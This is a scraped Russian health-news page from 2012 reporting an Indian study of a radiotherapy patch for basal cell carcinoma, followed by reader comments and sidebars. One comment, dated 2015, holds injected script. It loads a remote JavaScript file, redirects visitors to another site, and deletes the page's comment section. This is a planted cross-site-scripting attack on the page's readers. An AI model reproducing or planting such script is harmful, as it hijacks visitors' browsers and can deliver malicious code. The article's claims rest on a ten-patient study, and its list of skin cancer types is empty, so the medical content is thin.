Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новый метод борьбы с рако...  >>  Новый метод борьбы с раком кожи
 
Обратная связь
 

Новый метод борьбы с раком кожи

Размер шрифта
20 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Индийские ученые создали пластырь для лечения рака кожи. Согласно данным исследования, он полностью уничтожает опухоль на лице без использования хирургического лечения и лучевой терапии.

пластырь

Что такое рак кожи

К раку кожи относят следующие виды злокачественных опухолей:

Основным фактором риска развития рака кожи является ультрафиолетовое излучение.

Чаще всего встречается базально-клеточная карцинома, которая поражает поверхностные слои кожи. Как правило, она возникает на открытых участках кожи – на лице, шее, волосистой части головы.

В патологический процесс чаще всего вовлекаются:

  • носогубные складки;
  • крылья носа;
  • верхняя губа;
  • внутренние и наружные уголки глаз;
  • виски.

Наиболее распространена узелковая форма базально-клеточной карциномы. Вначале на коже лица появляется безболезненный узелок, который изъязвляется и покрывается корочкой. В течение нескольких месяцев или лет узелок растет вширь и приобретает дольчатое строение. С течением времени базально-клеточная карцинома превращается в большую (свыше 10 см) плоскую бляшку с шелушащейся поверхностью или в глубокую язву, разрушающую подлежащие мышечные ткани и кости.

Базально-клеточная карцинома не дает метастазов, т.е. опухолевые клетки не распространяются в другие органы и ткани из первичного очага.

Суть исследования

Индийские ученые разработали простой и безопасный метод лечения базально-клеточный карциномы. Данный метод является разновидностью лучевой терапии и представлен в виде пластыря. Пластырь позволяет точечно воздействовать на опухоль и обеспечивает гибель опухолевых клеток.

Новый метод идеально подходит для пациентов, которым трудно провести хирургическое лечение, особенно, если после него требуется пересадка кожного лоскута.

В исследовании приняли участие 10 пациентов в возрасте от 32 до 74 лет с базально-клеточной карциномой, которая была локализована на коже вокруг глаз, возле носа и на лбу. Все пациенты получали аппликацию пластыря на 1, 3 и 7 день лечения. Продолжительность лечения в течение каждого дня составляла 3 часа.

Пластырь воздействовал только на опухоль и не оказывал влияния на глубоко расположенные структуры и окружающие здоровые ткани.

По итогам трехлетнего наблюдения 8 из 10 пациентов полностью излечились от рака.

Результаты

Полученные результаты открывают новые возможности для лечения рака кожи. Простой и недорогой метод может применяться в амбулаторных условиях и не требует пребывания пациента в стационаре.

В ближайшем будущем пластырь может стать стандартом лечения базально-клеточной карциномы или альтернативой хирургическому лечению и лучевой терапии при невозможности их проведения. 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - АлександровАФ

20 июля 2012 в 10:53

Комментарий удален за нарушение Правил общения

2 - Наталко

20 июля 2012 в 13:58

Цитировать   |   Пожаловаться

А где можно приобрести такие пластыри? У мамы на лбу и в весочной части. Врачи сказали, что это старческое... (68 лет)

3 - Гость

10 августа 2012 в 02:46

Цитировать   |   Пожаловаться

Здравствуйте! Скажите, а данный пластырь можно использовать для лечения незаживающей раны на лице?У моего отца от выдавливания угря на носу образовалась ранка.Долго не заживала. Мы обратились к онкологу и дерматологу.Сдали анализ из ранки, но раковых клеток не обнаружили. Врач назначил лечение лучами.На момент лечения язвочка была диаметром 8-9 мм.После десяти процедур лучами и длительного и некрасивого заживания(был ожог) ранка зажила. Но прошло полгода и она опять потихоньку начала шелушиться и снова стала ранкой.Буду очень признательна за ответ.

4 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лекарство от рака ищите в обычном кафе   Бородавки и рак кожи: в чем взаимосвязь?   Специализированное питание как важный фактор лечения и реабилитации пациентов с онкологическими заболеваниями   Признаки рака, которые вы игнорируете  
19 июля 2012Пластырь лечит рак кожи! 06 февраля 2013Технология разведения коров позволяет определить риск развития рака
 
11 декабря 2012С помощью слепых крыс ученые узнали, как победить рак 18 октября 2012Новый тест скажет, будет у вас рак или нет
 

Слайдшоу

1
Темная сторона солнца! Чем оно опасно? Вы даже не догадываетесь, что у вас рак кожи!
Вся правда о раке кожи Самая лучшая еда для похудения, сердца и против рака
Факторы, которые влияют на возникновение рака Быстроразвивающиеся виды рака. Часть2
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.